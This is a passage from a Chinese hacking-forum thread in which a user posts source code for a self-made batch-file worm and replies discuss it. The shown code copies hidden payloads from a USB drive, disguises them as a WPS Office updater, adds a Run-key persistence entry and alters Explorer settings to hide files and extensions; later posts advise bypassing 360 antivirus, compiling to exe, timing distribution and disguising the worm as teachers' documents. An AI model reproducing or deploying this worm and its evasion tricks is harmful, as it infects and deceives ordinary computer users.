copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h C:\$RECYCLE-BIN REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s|find "WPS-Office更新" if ERRORLEVEL 1 ( start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe ) ) ) reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /d D:\$RECYCLE-BIN\Wpsupdater.exe /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f @echo off&setlocal enabledelayedexpansion for %%i in (%0) do (set "name=%%~ni") echo "%~sdp0%name%" set dt=.txt for %%h in (%dt%) do ( echo "%~sdp0%name%%%h" if exist "%~sdp0%name%%%h" ( attrib +s +h +a "%~sdp0%name%%%h" "%~sdp0%name%%%h" ) else ( attrib +s +h +a "%~sdp0%name%.exe" ) ) if /i not exist "C:\Developer-Certificate\USB-hacker" ( if /i not exist "D:\$RECYCLE-BIN\Wpsupdater.exe" ( md D:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h D:\$RECYCLE-BIN attrib -s -a -h D:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\" copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "D:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h D:\$RECYCLE-BIN start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe md C:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h C:\$RECYCLE-BIN attrib -s -a -h C:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "C:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h C:\$RECYCLE-BIN REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s|find "WPS-Office更新" if ERRORLEVEL 1 ( start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe ) ) else ( md D:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h D:\$RECYCLE-BIN attrib -s -a -h D:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\" copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "D:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h D:\$RECYCLE-BIN md C:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h C:\$RECYCLE-BIN attrib -s -a -h C:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "C:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h C:\$RECYCLE-BIN REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s|find "WPS-Office更新" if ERRORLEVEL 1 ( start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe ) ) ) reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /d D:\$RECYCLE-BIN\Wpsupdater.exe /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f 注意: 1.这个也是对于想优化本程序的人说的 中间之所以出现类似“set dpp=.ppt,.pot,.pps,.sldx”的代码 也是被360tm逼得无奈之举 当exe文件名称以 .doc .docx 等等文档格式结尾时 360会提示:您所打开的程序并不是普通的文档文件 很有可能是木马病毒伪装的文档文件 如果您不认识 请误操作。所以在主程序中 自我繁殖时 就无法把准确的后缀名赋予伪文件 只能一个一个试 如果都没有 则将自身隐藏(bat翻译为exe之后 就无法自我删除了,只好隐藏) [h13于2017-07-31 01:37编辑了帖子]
|
|
|
h13
发布于2017-07-31 01:16
板凳F
编译的教程和注意事项
首先打开 Bat→exe\Portable\Bat_To_Exe_Converter.exe 或者 Bat→exe\Portable\Bat_To_Exe_Converter_(x64).exe 这个取决于你的电脑是32还是64位系统 1. 图片:KC_FNV)8%(PXLEKOMT9~SXX.png 2. 图片:`YDH7~PH)N6VD~E4DHGX6U5.png 3编译成功(如果文件名中含有汉语 会提示 不符合a啥啥啥格式 但是不影响食用) . 图片:MIVZM45BWV3DAE91SPGHK}0.png 图片:S_4KH0D2TPRN9Z1Y`U$$~TF.png 刚刚编译出来,360都不会报毒 但是过不了12小时 360云那边就已经把这个文件拉黑了。建议等待360拉黑之后在进行传播 因为这样可以被用户主动加入白名单 然后加入开机启动。 BUT,目前有个小问题 windows似乎强加给我管理员权限(只要我把文件名命名为 Wpsupdater 就自动变成管理员权限的应用) 这个在运行时 会提示“是否给下列应用程序提供管理员权限” 这一个小问题目前我还没有解决 望大神帮助 这篇像老太婆的裹脚布一样又臭又长的帖子马上接近尾声(懒得讲解了 反正源代码我都放了出来 有心人自会成功) 还是得说一句 h13版权所有 改进 使用都随意 但是不经允许不能乱转 [h13于2017-07-31 01:52编辑了帖子]
|
|
|
h13
发布于2017-07-31 02:00
地板F
刚开始时 我连echo off都不知道啥意思 但是经过400小时(实际上远远不到) 就写出了一共上千行代码的小蠕虫病毒 小骄傲2333333
这个病毒会替换你D E F G H I J K L M N O P Q R S T U V W X Y Z盘下根目录所有文件夹(除了上述几个) 还有上述盘内 所有教师常用办公格式文件(.doc,.docx,.dot,.dotx,.xls,.xlsx,.mp4,.flv,.rmvb,.mpj,.mpg,.avi,.m4a,.mkv,.mov,.vob,.swf,.mpeg,.webm,.wmv,.3gp,.mp3,.m4a,.cd,.ogg,.asf,.wma,.wav,.mp3pro,.rm,.real,.ape,.module,.midi,.vqf,.audible,.flac,.vbr ,.jpg,.bmp,.tga,.tif,.psd ,.ppt,.pot,.pps,.sldx ,.txt )基本上感染了病毒 就没有几个老师敢全盘查杀(实际上不会丢文件 但是基本上所有老师都害怕丢而不敢弄) 对于批处理初学者说的几句话,也是这三百多小时中我犯的错误 1.千万不要用汉语输入法进行编辑 汉语的冒号 括号 逗号都不识别 2.编辑bat时 没有好用的编程器 没人帮你整理格式 建议自己保持良好的编程格式 3.如果出现了闪退的错误 建议还原到上一个版本 换一种写法 因为个人感觉cmd的逻辑很不严谨 |
|
|
h13
发布于2017-07-31 02:21
4楼F
因为东西太多 描述写的都很不完整 (因为马上开学了) 不懂或者改进的地方+QQ1491918308讨论
附 效果图 图片:Windows 10-2017-07-31-02-06-37.png 图片:Windows 10-2017-07-31-02-07-19.png 图片:Windows 10-2017-07-31-02-08-02.png 图片:Windows 10-2017-07-31-02-08-09.png 图片:Windows 10-2017-07-31-02-08-33.png 图片:Windows 10-2017-07-31-02-09-46.png 图片:Windows 10-2017-07-31-02-10-04.png 最后 看看回收站里我一共淘汰了多少历代版本2333333333 图片:Windows 10-2017-07-31-02-06-25.png |
|
红盟大使
发布于2017-07-31 08:42
5楼F
批处理病毒,好怀念啊,我记得我第一次写病毒的时候,也是批处理病毒(还有系统自带的vbs脚本语言做成的病毒),批处理做成的病毒,除了免杀难做以外,几乎具备一切好病毒拥有的特性,但批处理有个致命缺点,在内网传播,可以利用445端口,$IPC,亦或是弱口令、空口令,但一旦进入外网,只能选用邮件传播之类的方式,往后退十几年,在杀软还没有发展成熟的那段日子里,批处理病毒和其它语言写成的病毒比起来是有过之而无不及,到最近五年,依然有各种方法来绕过、破坏杀软,但是随着杀毒软件的发展,批处理病毒连发展的空间都已被抹杀,真的很感触,我刚开始入门的时候就是从这个开始学的,然后一点一点涉猎到现在的领域,看到批处理我就想起了我的整个网安入坑史。。。
这是我收集来的(有些是自己写的),一些比较厉害的批处理 图片:_PL(0ERFDDUTKMQRTVGG`CV.png 图片:D`TY163NC6SN8@%XBEGF_30.png 还有我病毒路上一路走来那些分析的样本 图片:ENZ4RYU5]2RU)LX8`_DVW28.png 图片:PFZ(YL$ZI`W4W_X@LD[EB3L.png 还有自己的一点小小的尝试,从入门时只有简单的0%|0%加上简单的$IPC空口令传播,到现在我已经能花样玩 图片:31T]W0GSV3TQ9I7LZSYRK(M.png 图片:865$E`S_Q@1]~N2FJ1A~{0M.png 图片:GQR@NOCZWWFAQ6GJ@CDHYZN.png |
|
|
红盟大使
发布于2017-07-31 08:44
6楼F
补上上一楼,最下面那两张vbs、bat脚本病毒,应该是我在脚本病毒领域达到的最高水平了(然后觉得一直玩这个就没意思了,就去研究其他病毒,很幸运,正是因为我的这个想法,让我遇到了我在病毒领域的恩师,毫不夸张的说,是他带我第一次了解了信息安全这个概念),两年前的它能够在内网高效的传播,也可以对大部分杀软进行有效的破坏,在我看来这以及接近了很多完善的病毒了,楼主绕过杀软的方式很不错,让我脑洞大开,可惜我这种搞破坏类型的大杀器bat是很难借鉴的
图片:}F4_DXP)A17M8YASW]HR]27.png 图片:@`W42C${A278X1YY@4VF{CD.png 图片:KOW~BVZ]D){VZ@9P8FV{O86.png 图片:G~3INZ]5BLA(0]}}1]S7}XK.png 图片:UF_$APGWLV0A})HYXL5DC4V.png 图片:1ZPS67)9P2X6ICQ}}O_`}RI.png |
|
|
|
ryq1212
发布于2017-07-31 12:40
7楼F
这里苦逼河南高三狗,似乎没多少时间续给火箭了。你哪里的?我郑州。
|
|
|
h13
发布于2017-07-31 14:27
8楼F
|
|
|
h13
发布于2017-07-31 14:30
9楼F
|
|
|
h13
发布于2017-07-31 14:34
10楼F
|
|
红盟大使
发布于2017-07-31 16:11
11楼F
|
|
|
|
ddslihai
发布于2017-08-04 20:47
12楼F
软件定制,成熟软件在线交易,产品经理在线预约,软件开发不找威客平台,就找大大神。大大神注册网址:https://www.dadashen.com/UserRegister/Register?InvitationCode=13826500758
|
|
qwsxmkoi
发布于2017-08-07 00:42
13楼F
好久不见H13,话说楼上的广告也没人处理的么
|
|
|
|
h13
发布于2017-08-16 01:24
14楼F
|
|
笑来
发布于2017-09-13 16:30
15楼F
图都裂了耶
|
|
|
|
Trovedrawski
发布于2021-02-22 22:21
16楼F
|
|
兰若,公主魂
发布于2021-03-25 17:32
17楼F
这个可是害人之物。
|
|
|
兰若,公主魂
发布于2022-03-15 21:02
18楼F
|
|
|
兰若,公主魂
发布于2022-03-18 22:03
19楼F
|
|
|